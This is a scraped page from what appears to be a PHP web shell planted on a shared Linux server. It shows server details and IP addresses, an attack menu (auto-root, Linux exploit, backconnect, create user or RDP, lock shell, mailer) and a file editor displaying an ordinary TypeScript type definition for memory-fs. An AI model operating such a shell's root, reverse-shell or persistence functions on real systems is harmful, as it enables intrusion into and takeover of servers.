Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
memory-fs /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
index.d.ts
2.63
KB
-rw-r--r--
package.json
721
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for memory-fs 0.3.0 // Project: https://github.com/webpack/memory-fs // Definitions by: e-cloud <https://github.com/e-cloud> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped // TypeScript Version: 3.7 /// <reference types="node" /> declare class MemoryFileSystem { data: any; constructor(data?: any); meta(_path: string): any; existsSync(_path: string): boolean; statSync(_path: string): { isFile: () => boolean; isDirectory: () => boolean; isBlockDevice: () => boolean; isCharacterDevice: () => boolean; isSymbolicLink: () => boolean; isFIFO: () => boolean; isSocket: () => boolean; }; readFileSync(_path: string, encoding?: string): any; readdirSync(_path: string): string[]; mkdirpSync(_path: string): void; mkdirSync(_path: string): void; _remove(_path: string, name: string, testFn: ((part: string) => boolean)): void; rmdirSync(_path: string): void; unlinkSync(_path: string): void; readlinkSync(_path: string): string; writeFileSync(_path: string, content: string | Buffer, encoding?: string): void; createReadStream( path: string, options?: { start: number; end: number; } ): any; createWriteStream(path: string, options?: any): any; exists(path: string, callback: (isExist: boolean) => void): void; writeFile(path: string, content: string | Buffer, callback: (err: Error | undefined) => void): void; writeFile(path: string, content: string | Buffer, encoding: string, callback: (err: Error | undefined) => void): void; join(path: string, request: string): string; pathToArray(path: string): string[]; normalize(path: string): string; stat(path: string, callback: (err: Error | null, result?: any) => void): void; readdir(path: string, callback: (err: Error | null, result?: any) => void): void; mkdirp(path: string, callback: (err: Error | null, result?: any) => void): void; rmdir(path: string, callback: (err: Error | null, result?: any) => void): void; unlink(path: string, callback: (err: Error | null, result?: any) => void): void; readlink(path: string, callback: (err: Error | null, result?: any) => void): void; mkdir(path: string, callback: (err: Error | null) => void): void; mkdir(path: string, optArg: {}, callback: (err: Error | null, result?: any) => void): void; readFile(path: string, callback: (err: Error | null, result?: any) => void): void; readFile(path: string, optArg: {}, callback: (err: Error | null, result?: any) => void): void; } export = MemoryFileSystem;
Close